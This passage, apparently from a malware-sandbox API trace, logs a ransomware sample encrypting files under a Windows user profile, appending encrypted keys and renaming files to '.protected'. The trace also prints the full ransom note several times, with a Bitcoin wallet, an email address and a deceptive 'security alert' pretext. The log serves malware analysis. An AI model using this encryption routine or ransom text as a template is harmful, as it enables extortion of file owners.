lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.651] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.651] CloseHandle (hObject=0x150) returned 1 [0094.651] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected") returned 88 [0094.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.protected")) returned 1 [0094.652] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.652] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.653] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt") returned 86 [0094.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.653] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.653] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.654] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.654] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.654] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.654] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.654] CloseHandle (hObject=0x14c) returned 1 [0094.655] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0094.655] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.655] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0094.655] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0094.656] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.656] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.656] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0094.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.656] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0094.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.656] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0094.656] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.658] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.658] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.658] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.658] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.660] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.660] CloseHandle (hObject=0x14c) returned 1 [0094.716] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected") returned 94 [0094.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.protected")) returned 1 [0094.717] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0094.717] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.717] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0094.717] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0094.717] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.717] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.717] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.717] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0094.718] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.718] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0094.718] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.718] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0094.718] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.719] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.719] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.719] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.719] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.720] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.720] CloseHandle (hObject=0x14c) returned 1 [0094.720] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected") returned 83 [0094.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.protected")) returned 1 [0094.720] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.720] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.720] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt") returned 75 [0094.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.721] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.721] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.721] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.721] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.721] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.721] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.721] CloseHandle (hObject=0xd8) returned 1 [0094.722] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="Windows") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files (x86)") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="System Volume Information") returned 1 [0094.722] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media") returned 58 [0094.722] lstrcmpW (lpString1="Windows Media", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="Windows Media", lpString2="..") returned 1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*") returned 60 [0094.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.722] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.722] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.722] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.722] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\.") returned 60 [0094.722] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.722] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.722] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.722] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.722] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.722] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\..") returned 61 [0094.722] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.722] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="Windows") returned -1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="Program Files") returned -1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="Program Files (x86)") returned -1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="System Volume Information") returned -1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 63 [0094.722] lstrcmpW (lpString1="12.0", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="12.0", lpString2="..") returned 1 [0094.722] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned 65 [0094.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.723] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.723] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.723] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.723] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.723] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.723] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\.") returned 65 [0094.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.723] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.723] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.723] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.723] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.723] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.723] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.723] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\..") returned 66 [0094.723] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.723] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.723] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Windows") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files (x86)") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="$Recycle.bin") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="System Volume Information") returned 1 [0094.723] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.723] StrStrIW (lpFirst="WMSDKNS.DTD", lpSrch=".protected") returned 0x0 [0094.723] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="RESTORE_FILES.txt") returned 1 [0094.723] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.723] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.724] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.724] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".txt") returned 0x0 [0094.724] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.724] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".rar") returned 0x0 [0094.724] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.724] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".zip") returned 0x0 [0094.724] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0094.725] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.725] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1f2, 